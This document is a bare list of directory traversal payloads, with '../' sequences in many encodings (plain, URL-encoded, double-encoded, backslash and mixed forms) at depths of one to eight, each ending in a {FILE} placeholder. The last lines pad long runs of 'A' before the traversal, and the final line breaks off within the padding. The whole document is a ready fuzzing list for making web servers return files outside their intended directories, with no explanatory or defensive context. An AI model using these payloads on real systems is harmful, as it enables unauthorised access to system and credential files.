%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
\../{FILE}<br />
\../\../{FILE}<br />
\../\../\../{FILE}<br />
\../\../\../\../{FILE}<br />
\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../\../{FILE}<br />
/..\{FILE}<br />
/..\/..\{FILE}<br />
/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA